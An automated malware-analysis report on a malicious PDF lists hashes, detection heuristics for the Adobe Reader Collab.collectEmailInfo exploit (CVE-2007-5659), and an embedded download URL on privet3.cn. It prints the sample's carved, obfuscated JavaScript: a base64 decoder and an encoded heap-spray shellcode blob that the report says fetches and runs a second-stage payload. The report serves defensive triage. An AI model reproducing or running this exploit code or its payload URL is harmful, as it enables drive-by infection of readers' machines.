Malicious PDF — malware analysis report

Static analysis result for SHA-256 f8affd91ea291655…

MALICIOUS

PDF

3.0 KB First seen: 2013-03-04
MD5: 6103d735cf4d49bed5220a36956dade3 SHA-1: 452a048dcf718bdeec435e37852f561b9c0e8035 SHA-256: f8affd91ea2916558820c647f0345cab958334fb19f3fc4223afb70ef52050bf
258 Risk Score

Malware Insights

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF and JavaScript. The embedded JavaScript stream, named 'javascript_obj0009_000.js', is likely designed to execute malicious code. The presence of 'String.fromCharCode' and general script obfuscation indicators suggests an attempt to hide the script's true functionality, which is likely to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
          chr3 = ((enc3 & 3) << 6) | enc4;
          output = output + String.fromCharCode(chr1);
          if (enc3 != 64) {
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://privet3.cn/myexp2/getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js pdf-javascript-stream PDF /JS object 9 at offset 0xD6 20985 bytes
SHA-256: 7d471751a4508645d9294f086fcb9d46f8a20cb2e36df476cefa9e930fbef423
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;
   input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
   do {
      enc1 = keyXXXStr.indexOf(input.charAt(i++));
      enc2 = keyXXXStr.indexOf(input.charAt(i++));
      enc3 = keyXXXStr.indexOf(input.charAt(i++));
      enc4 = keyXXXStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
         output = output + String.fromCharCode(chr2);
      }
      if (enc4 != 64) {
         output = output + String.fromCharCode(chr3);
      }
   } while (i < input.length);
   return output;
}
var aasd = decode64("CiB2YXIgQTVYaXFsTmg1MSA9IG5ldyBBcnJheSgpOwogdmFyIG4yNFBoYUw5NGk7CiB2YXIgbGF2ZSA9IGV2YWw7CiAgbGF2ZSh1bmVzY2FwZSgiJTIwJTIwJTY2JTc1JTZlJTYzJTc0JTY5JTZmJTZlJTIwJTRhJTRjJTc4JTY3JTQ3JTMxJTQ3JTZmJTQ0JTc2JTI4JTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTJjJTIwJTQyJTU5JTVhJTM0JTc4JTQ3JTY1JTRhJTUwJTY4JTI5JTIwJTIwJTdiJTIwJTIwJTIwJTIwJTc3JTY4JTY5JTZjJTY1JTI4JTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTJlJTZjJTY1JTZlJTY3JTc0JTY4JTIwJTJhJTIwJTMyJTIwJTNjJTIwJTQyJTU5JTVhJTM0JTc4JTQ3JTY1JTRhJTUwJTY4JTI5JTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTIwJTJiJTNkJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTNiJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTIwJTNkJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTJlJTczJTc1JTYyJTczJTc0JTcyJTY5JTZlJTY3JTI4JTMwJTJjJTIwJTQyJTU5JTVhJTM0JTc4JTQ3JTY1JTRhJTUwJTY4JTIwJTJmJTIwJTMyJTI5JTNiJTIwJTIwJTIwJTIwJTcyJTY1JTc0JTc1JTcyJTZlJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTNiJTIwJTIwJTdkJTIwIikpOyAgbGF2ZSh1bmVzY2FwZSgiJTIwJTIwJTIwJTY2JTc1JTZlJTYzJTc0JTY5JTZmJTZlJTIwJTQzJTQyJTMzJTdhJTcyJTRhJTdhJTM4JTM5JTQ0JTI4JTQzJTQ5JTM3JTMzJTMyJTY5JTczJTU2JTY4JTUxJTI5JTIwJTIwJTdiJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTQzJTQ5JTM3JTMzJTMyJTY5JTczJTU2JTY4JTUxJTIwJTNkJTNkJTIwJTMwJTI5JTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTQ2JTY4JTc5JTYzJTZjJTc3JTc0JTUwJTQ3JTRhJTIwJTNkJTIwJTMwJTc4JTMwJTYzJTMwJTYzJTMwJTYzJTMwJTYzJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTYxJTQ5JTU1JTMwJTQ4JTRjJTU0JTQ4JTU0JTYyJTIwJTNkJTIwJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM4JTQyJTM2JTM0JTI1JTc1JTMzJTMwJTM0JTMwJTI1JTc1JTMwJTQzJTM3JTM4JTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQyJTMwJTQzJTI1JTc1JTMxJTQzJTM3JTMwJTI1JTc1JTM4JTQyJTQxJTQ0JTI1JTc1JTMwJTM4JTM1JTM4JTI1JTc1JTMwJTM5JTQ1JTQyJTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQ0JTMzJTM0JTI1JTc1JTM3JTQzJTM0JTMwJTI1JTc1JTM1JTM4JTM4JTQyJTI1JTc1JTM2JTQxJTMzJTQzJTI1JTc1JTM1JTQxJTM0JTM0JTI1JTc1JTQ1JTMyJTQ0JTMxJTI1JTc1JTQ1JTMyJTMyJTQyJTI1JTc1JTQ1JTQzJTM4JTQyJTI1JTc1JTM0JTQ2JTQ1JTQyJTI1JTc1JTM1JTMyJTM1JTQxJTI1JTc1JTQ1JTQxJTM4JTMzJTI1JTc1JTM4JTM5JTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTM3JTM1JTM2JTI1JTc1JTM3JTMzJTM4JTQyJTI1JTc1JTM4JTQyJTMzJTQzJTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTMwJTMzJTM3JTM4JTI1JTc1JTM1JTM2JTQ2JTMzJTI1JTc1JTM3JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTMwJTI1JTc1JTMzJTMzJTQ2JTMzJTI1JTc1JTM0JTM5JTQzJTM5JTI1JTc1JTM0JTMxJTM1JTMwJTI1JTc1JTMzJTMzJTQxJTQ0JTI1JTc1JTMzJTM2JTQ2JTQ2JTI1JTc1JTQyJTQ1JTMwJTQ2JTI1JTc1JTMwJTMzJTMxJTM0JTI1JTc1JTQ2JTMyJTMzJTM4JTI1JTc1JTMwJTM4JTM3JTM0JTI1JTc1JTQzJTQ2JTQzJTMxJTI1JTc1JTMwJTMzJTMwJTQ0JTI1JTc1JTM0JTMwJTQ2JTQxJTI1JTc1JTQ1JTQ2JTQ1JTQyJTI1JTc1JTMzJTQyJTM1JTM4JTI1JTc1JTM3JTM1JTQ2JTM4JTI1JTc1JTM1JTQ1JTQ1JTM1JTI1JTc1JTM0JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTM0JTI1JTc1JTM2JTM2JTQzJTMzJTI1JTc1JTMwJTQzJTM4JTQyJTI1JTc1JTM4JTQyJTM0JTM4JTI1JTc1JTMxJTQzJTM1JTM2JTI1JTc1JTQ0JTMzJTMwJTMzJTI1JTc1JTMwJTM0JTM4JTQyJTI1JTc1JTMwJTMzJTM4JTQxJTI1JTc1JTM1JTQ2JTQzJTMzJTI1JTc1JTM1JTMwJTM1JTQ1JTI1JTc1JTM4JTQ0JTQzJTMzJTI1JTc1JTMwJTM4JTM3JTQ0JTI1JTc1JTM1JTMyJTM1JTM3JTI1JTc1JTMzJTMzJTQyJTM4JTI1JTc1JTM4JTQxJTQzJTQxJTI1JTc1JTQ1JTM4JTM1JTQyJTI1JTc1JTQ2JTQ2JTQxJTMyJTI1JTc1JTQ2JTQ2JTQ2JTQ2JTI1JTc1JTQzJTMwJTMzJTMyJTI1JTc1JTQ2JTM3JTM4JTQyJTI1JTc1JTQxJTQ1JTQ2JTMyJTI1JTc1JTQyJTM4JTM0JTQ2JTI1JTc1JTMyJTQ1JTM2JTM1JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTM2JTM2JTQxJTQyJTI1JTc1JTM2JTM2JTM5JTM4JTI1JTc1JTQyJTMwJTQxJTQyJTI1JTc1JTM4JTQxJTM2JTQzJTI1JTc1JTM5JTM4JTQ1JTMwJTI1JTc1JTM2JTM4JTM1JTMwJTI1JTc1JTM2JTQ1JTM2JTQ2JTI1JTc1JTM2JTM0JTMyJTQ1JTI1JTc1JTM3JTM1JTM2JTM4JTI1JTc1JTM2JTQzJTM3JTMyJTI1JTc1JTM1JTM0JTM2JTQ0JTI1JTc1JTM4JTQ1JTQyJTM4JTI1JTc1JTMwJTQ1JTM0JTQ1JTI1JTc1JTQ2JTQ2JTQ1JTQzJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTMwJTM5JTMzJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM1JTMwJTM1JTMwJTI1JTc1JTM4JTQyJTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTQzJTMyJTM4JTMzJTI1JTc1JTM4JTMzJTM3JTQ2JTI1JTc1JTMzJTMxJTQzJTMyJTI1JTc1JTM1JTMwJTM1JTMyJTI1JTc1JTMzJTM2JTQyJTM4JTI1JTc1JTMyJTQ2JTMxJTQxJTI1JTc1JTQ2JTQ2JTM3JTMwJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTMzJTMzJTM1JTQyJTI1JTc1JTM1JTM3JTQ2JTQ2JTI1JTc1JTQyJTM4JTM1JTM2JTI1JTc1JTQ2JTQ1JTM5JTM4JTI1JTc1JTMwJTQ1JTM4JTQxJTI1JTc1JTM1JTM1JTQ2JTQ2JTI1JTc1JTM1JTM3JTMwJTM0JTI1JTc1JTQ1JTQ2JTQyJTM4JTI1JTc1JTQ1JTMwJTQzJTQ1JTI1JTc1JTQ2JTQ2JTM2JTMwJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM3JTM0JTM2JTM4JTI1JTc1JTM3JTMwJTM3JTM0JTI1JTc1JTMyJTQ2JTMzJTQxJTI1JTc1JTM3JTMwJTMyJTQ2JTI1JTc1JTM2JTM5JTM3JTMyJTI1JTc1JTM2JTM1JTM3JTM2JTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTM2JTMzJTMyJTQ1JTI1JTc1JTMyJTQ2JTM2JTQ1JTI1JTc1JTM3JTM5JTM2JTQ0JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMzJTMyJTM3JTMwJTI1JTc1JTM2JTM3JTMyJTQ2JTI1JTc1JTM3JTM0JTM2JTM1JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMyJTQ1JTM2JTM1JTI1JTc1JTM2JTM4JTM3JTMwJTI1JTc1JTMzJTQ2JTM3JTMwJTI1JTc1JTM3JTMwJTM3JTMzJTI1JTc1JTMzJTQ0JTM2JTQzJTI1JTc1JTM2JTM0JTM3JTMwJTI1JTc1JTM1JTQ2JTM2JTM2JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMwJTMwJTM3JTMwJTIyJTI5JTNiJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTY1JTZjJTczJTY1JTIwJTY5JTY2JTI4JTQzJTQ5JTM3JTMzJTMyJTY5JTczJTU2JTY4JTUxJTIwJTNkJTNkJTIwJTMxJTI5JTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTQ2JTY4JTc5JTYzJTZjJTc3JTc0JTUwJTQ3JTRhJTIwJTNkJTIwJTMwJTc4JTMzJTMwJTMzJTMwJTMzJTMwJTMzJTMwJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTYxJTQ5JTU1JTMwJTQ4JTRjJTU0JTQ4JTU0JTYyJTIwJTNkJTIwJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM4JTQyJTM2JTM0JTI1JTc1JTMzJTMwJTM0JTMwJTI1JTc1JTMwJTQzJTM3JTM4JTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQyJTMwJTQzJTI1JTc1JTMxJTQzJTM3JTMwJTI1JTc1JTM4JTQyJTQxJTQ0JTI1JTc1JTMwJTM4JTM1JTM4JTI1JTc1JTMwJTM5JTQ1JTQyJTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQ0JTMzJTM0JTI1JTc1JTM3JTQzJTM0JTMwJTI1JTc1JTM1JTM4JTM4JTQyJTI1JTc1JTM2JTQxJTMzJTQzJTI1JTc1JTM1JTQxJTM0JTM0JTI1JTc1JTQ1JTMyJTQ0JTMxJTI1JTc1JTQ1JTMyJTMyJTQyJTI1JTc1JTQ1JTQzJTM4JTQyJTI1JTc1JTM0JTQ2JTQ1JTQyJTI1JTc1JTM1JTMyJTM1JTQxJTI1JTc1JTQ1JTQxJTM4JTMzJTI1JTc1JTM4JTM5JTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTM3JTM1JTM2JTI1JTc1JTM3JTMzJTM4JTQyJTI1JTc1JTM4JTQyJTMzJTQzJTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTMwJTMzJTM3JTM4JTI1JTc1JTM1JTM2JTQ2JTMzJTI1JTc1JTM3JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTMwJTI1JTc1JTMzJTMzJTQ2JTMzJTI1JTc1JTM0JTM5JTQzJTM5JTI1JTc1JTM0JTMxJTM1JTMwJTI1JTc1JTMzJTMzJTQxJTQ0JTI1JTc1JTMzJTM2JTQ2JTQ2JTI1JTc1JTQyJTQ1JTMwJTQ2JTI1JTc1JTMwJTMzJTMxJTM0JTI1JTc1JTQ2JTMyJTMzJTM4JTI1JTc1JTMwJTM4JTM3JTM0JTI1JTc1JTQzJTQ2JTQzJTMxJTI1JTc1JTMwJTMzJTMwJTQ0JTI1JTc1JTM0JTMwJTQ2JTQxJTI1JTc1JTQ1JTQ2JTQ1JTQyJTI1JTc1JTMzJTQyJTM1JTM4JTI1JTc1JTM3JTM1JTQ2JTM4JTI1JTc1JTM1JTQ1JTQ1JTM1JTI1JTc1JTM0JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTM0JTI1JTc1JTM2JTM2JTQzJTMzJTI1JTc1JTMwJTQzJTM4JTQyJTI1JTc1JTM4JTQyJTM0JTM4JTI1JTc1JTMxJTQzJTM1JTM2JTI1JTc1JTQ0JTMzJTMwJTMzJTI1JTc1JTMwJTM0JTM4JTQyJTI1JTc1JTMwJTMzJTM4JTQxJTI1JTc1JTM1JTQ2JTQzJTMzJTI1JTc1JTM1JTMwJTM1JTQ1JTI1JTc1JTM4JTQ0JTQzJTMzJTI1JTc1JTMwJTM4JTM3JTQ0JTI1JTc1JTM1JTMyJTM1JTM3JTI1JTc1JTMzJTMzJTQyJTM4JTI1JTc1JTM4JTQxJTQzJTQxJTI1JTc1JTQ1JTM4JTM1JTQyJTI1JTc1JTQ2JTQ2JTQxJTMyJTI1JTc1JTQ2JTQ2JTQ2JTQ2JTI1JTc1JTQzJTMwJTMzJTMyJTI1JTc1JTQ2JTM3JTM4JTQyJTI1JTc1JTQxJTQ1JTQ2JTMyJTI1JTc1JTQyJTM4JTM0JTQ2JTI1JTc1JTMyJTQ1JTM2JTM1JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTM2JTM2JTQxJTQyJTI1JTc1JTM2JTM2JTM5JTM4JTI1JTc1JTQyJTMwJTQxJTQyJTI1JTc1JTM4JTQxJTM2JTQzJTI1JTc1JTM5JTM4JTQ1JTMwJTI1JTc1JTM2JTM4JTM1JTMwJTI1JTc1JTM2JTQ1JTM2JTQ2JTI1JTc1JTM2JTM0JTMyJTQ1JTI1JTc1JTM3JTM1JTM2JTM4JTI1JTc1JTM2JTQzJTM3JTMyJTI1JTc1JTM1JTM0JTM2JTQ0JTI1JTc1JTM4JTQ1JTQyJTM4JTI1JTc1JTMwJTQ1JTM0JTQ1JTI1JTc1JTQ2JTQ2JTQ1JTQzJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTMwJTM5JTMzJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM1JTMwJTM1JTMwJTI1JTc1JTM4JTQyJTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTQzJTMyJTM4JTMzJTI1JTc1JTM4JTMzJTM3JTQ2JTI1JTc1JTMzJTMxJTQzJTMyJTI1JTc1JTM1JTMwJTM1JTMyJTI1JTc1JTMzJTM2JTQyJTM4JTI1JTc1JTMyJTQ2JTMxJTQxJTI1JTc1JTQ2JTQ2JTM3JTMwJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTMzJTMzJTM1JTQyJTI1JTc1JTM1JTM3JTQ2JTQ2JTI1JTc1JTQyJTM4JTM1JTM2JTI1JTc1JTQ2JTQ1JTM5JTM4JTI1JTc1JTMwJTQ1JTM4JTQxJTI1JTc1JTM1JTM1JTQ2JTQ2JTI1JTc1JTM1JTM3JTMwJTM0JTI1JTc1JTQ1JTQ2JTQyJTM4JTI1JTc1JTQ1JTMwJTQzJTQ1JTI1JTc1JTQ2JTQ2JTM2JTMwJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM3JTM0JTM2JTM4JTI1JTc1JTM3JTMwJTM3JTM0JTI1JTc1JTMyJTQ2JTMzJTQxJTI1JTc1JTM3JTMwJTMyJTQ2JTI1JTc1JTM2JTM5JTM3JTMyJTI1JTc1JTM2JTM1JTM3JTM2JTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTM2JTMzJTMyJTQ1JTI1JTc1JTMyJTQ2JTM2JTQ1JTI1JTc1JTM3JTM5JTM2JTQ0JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMzJTMyJTM3JTMwJTI1JTc1JTM2JTM3JTMyJTQ2JTI1JTc1JTM3JTM0JTM2JTM1JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMyJTQ1JTM2JTM1JTI1JTc1JTM2JTM4JTM3JTMwJTI1JTc1JTMzJTQ2JTM3JTMwJTI1JTc1JTM3JTMwJTM3JTMzJTI1JTc1JTMzJTQ0JTM2JTQzJTI1JTc1JTM2JTM0JTM3JTMwJTI1JTc1JTM1JTQ2JTM2JTM2JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMwJTMwJTM3JTMwJTIyJTI5JTNiJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTY1JTZjJTczJTY1JTIwJTY5JTY2JTI4JTQzJTQ5JTM3JTMzJTMyJTY5JTczJTU2JTY4JTUxJTIwJTNkJTNkJTIwJTMyJTI5JTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTYxJTQ5JTU1JTMwJTQ4JTRjJTU0JTQ4JTU0JTYyJTIwJTNkJTIwJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM4JTQyJTM2JTM0JTI1JTc1JTMzJTMwJTM0JTMwJTI1JTc1JTMwJTQzJTM3JTM4JTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQyJTMwJTQzJTI1JTc1JTMxJTQzJTM3JTMwJTI1JTc1JTM4JTQyJTQxJTQ0JTI1JTc1JTMwJTM4JTM1JTM4JTI1JTc1JTMwJTM5JTQ1JTQyJTI1JTc1JTM0JTMwJTM4JTQyJTI1JTc1JTM4JTQ0JTMzJTM0JTI1JTc1JTM3JTQzJTM0JTMwJTI1JTc1JTM1JTM4JTM4JTQyJTI1JTc1JTM2JTQxJTMzJTQzJTI1JTc1JTM1JTQxJTM0JTM0JTI1JTc1JTQ1JTMyJTQ0JTMxJTI1JTc1JTQ1JTMyJTMyJTQyJTI1JTc1JTQ1JTQzJTM4JTQyJTI1JTc1JTM0JTQ2JTQ1JTQyJTI1JTc1JTM1JTMyJTM1JTQxJTI1JTc1JTQ1JTQxJTM4JTMzJTI1JTc1JTM4JTM5JTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTM3JTM1JTM2JTI1JTc1JTM3JTMzJTM4JTQyJTI1JTc1JTM4JTQyJTMzJTQzJTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTMwJTMzJTM3JTM4JTI1JTc1JTM1JTM2JTQ2JTMzJTI1JTc1JTM3JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTMwJTI1JTc1JTMzJTMzJTQ2JTMzJTI1JTc1JTM0JTM5JTQzJTM5JTI1JTc1JTM0JTMxJTM1JTMwJTI1JTc1JTMzJTMzJTQxJTQ0JTI1JTc1JTMzJTM2JTQ2JTQ2JTI1JTc1JTQyJTQ1JTMwJTQ2JTI1JTc1JTMwJTMzJTMxJTM0JTI1JTc1JTQ2JTMyJTMzJTM4JTI1JTc1JTMwJTM4JTM3JTM0JTI1JTc1JTQzJTQ2JTQzJTMxJTI1JTc1JTMwJTMzJTMwJTQ0JTI1JTc1JTM0JTMwJTQ2JTQxJTI1JTc1JTQ1JTQ2JTQ1JTQyJTI1JTc1JTMzJTQyJTM1JTM4JTI1JTc1JTM3JTM1JTQ2JTM4JTI1JTc1JTM1JTQ1JTQ1JTM1JTI1JTc1JTM0JTM2JTM4JTQyJTI1JTc1JTMwJTMzJTMyJTM0JTI1JTc1JTM2JTM2JTQzJTMzJTI1JTc1JTMwJTQzJTM4JTQyJTI1JTc1JTM4JTQyJTM0JTM4JTI1JTc1JTMxJTQzJTM1JTM2JTI1JTc1JTQ0JTMzJTMwJTMzJTI1JTc1JTMwJTM0JTM4JTQyJTI1JTc1JTMwJTMzJTM4JTQxJTI1JTc1JTM1JTQ2JTQzJTMzJTI1JTc1JTM1JTMwJTM1JTQ1JTI1JTc1JTM4JTQ0JTQzJTMzJTI1JTc1JTMwJTM4JTM3JTQ0JTI1JTc1JTM1JTMyJTM1JTM3JTI1JTc1JTMzJTMzJTQyJTM4JTI1JTc1JTM4JTQxJTQzJTQxJTI1JTc1JTQ1JTM4JTM1JTQyJTI1JTc1JTQ2JTQ2JTQxJTMyJTI1JTc1JTQ2JTQ2JTQ2JTQ2JTI1JTc1JTQzJTMwJTMzJTMyJTI1JTc1JTQ2JTM3JTM4JTQyJTI1JTc1JTQxJTQ1JTQ2JTMyJTI1JTc1JTQyJTM4JTM0JTQ2JTI1JTc1JTMyJTQ1JTM2JTM1JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTM2JTM2JTQxJTQyJTI1JTc1JTM2JTM2JTM5JTM4JTI1JTc1JTQyJTMwJTQxJTQyJTI1JTc1JTM4JTQxJTM2JTQzJTI1JTc1JTM5JTM4JTQ1JTMwJTI1JTc1JTM2JTM4JTM1JTMwJTI1JTc1JTM2JTQ1JTM2JTQ2JTI1JTc1JTM2JTM0JTMyJTQ1JTI1JTc1JTM3JTM1JTM2JTM4JTI1JTc1JTM2JTQzJTM3JTMyJTI1JTc1JTM1JTM0JTM2JTQ0JTI1JTc1JTM4JTQ1JTQyJTM4JTI1JTc1JTMwJTQ1JTM0JTQ1JTI1JTc1JTQ2JTQ2JTQ1JTQzJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM1JTMwJTM5JTMzJTI1JTc1JTQzJTMwJTMzJTMzJTI1JTc1JTM1JTMwJTM1JTMwJTI1JTc1JTM4JTQyJTM1JTM2JTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTQzJTMyJTM4JTMzJTI1JTc1JTM4JTMzJTM3JTQ2JTI1JTc1JTMzJTMxJTQzJTMyJTI1JTc1JTM1JTMwJTM1JTMyJTI1JTc1JTMzJTM2JTQyJTM4JTI1JTc1JTMyJTQ2JTMxJTQxJTI1JTc1JTQ2JTQ2JTM3JTMwJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTMzJTMzJTM1JTQyJTI1JTc1JTM1JTM3JTQ2JTQ2JTI1JTc1JTQyJTM4JTM1JTM2JTI1JTc1JTQ2JTQ1JTM5JTM4JTI1JTc1JTMwJTQ1JTM4JTQxJTI1JTc1JTM1JTM1JTQ2JTQ2JTI1JTc1JTM1JTM3JTMwJTM0JTI1JTc1JTQ1JTQ2JTQyJTM4JTI1JTc1JTQ1JTMwJTQzJTQ1JTI1JTc1JTQ2JTQ2JTM2JTMwJTI1JTc1JTMwJTM0JTM1JTM1JTI1JTc1JTM3JTM0JTM2JTM4JTI1JTc1JTM3JTMwJTM3JTM0JTI1JTc1JTMyJTQ2JTMzJTQxJTI1JTc1JTM3JTMwJTMyJTQ2JTI1JTc1JTM2JTM5JTM3JTMyJTI1JTc1JTM2JTM1JTM3JTM2JTI1JTc1JTMzJTMzJTM3JTM0JTI1JTc1JTM2JTMzJTMyJTQ1JTI1JTc1JTMyJTQ2JTM2JTQ1JTI1JTc1JTM3JTM5JTM2JTQ0JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMzJTMyJTM3JTMwJTI1JTc1JTM2JTM3JTMyJTQ2JTI1JTc1JTM3JTM0JTM2JTM1JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMyJTQ1JTM2JTM1JTI1JTc1JTM2JTM4JTM3JTMwJTI1JTc1JTMzJTQ2JTM3JTMwJTI1JTc1JTM3JTMwJTM3JTMzJTI1JTc1JTMzJTQ0JTM2JTQzJTI1JTc1JTM2JTM0JTM3JTMwJTI1JTc1JTM1JTQ2JTM2JTM2JTI1JTc1JTM3JTM4JTM2JTM1JTI1JTc1JTMwJTMwJTM3JTMwJTIyJTI5JTNiJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTc0JTU3JTc1JTYzJTU5JTc2JTRiJTUyJTUxJTMyJTIwJTNkJTIwJTMwJTc4JTM0JTMwJTMwJTMwJTMwJTMwJTNiJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTUwJTU0JTZhJTcyJTM3JTU1JTZlJTdhJTc0JTM1JTIwJTNkJTIwJTYxJTQ5JTU1JTMwJTQ4JTRjJTU0JTQ4JTU0JTYyJTJlJTZjJTY1JTZlJTY3JTc0JTY4JTIwJTJhJTIwJTMyJTNiJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTQyJTU5JTVhJTM0JTc4JTQ3JTY1JTRhJTUwJTY4JTIwJTNkJTIwJTc0JTU3JT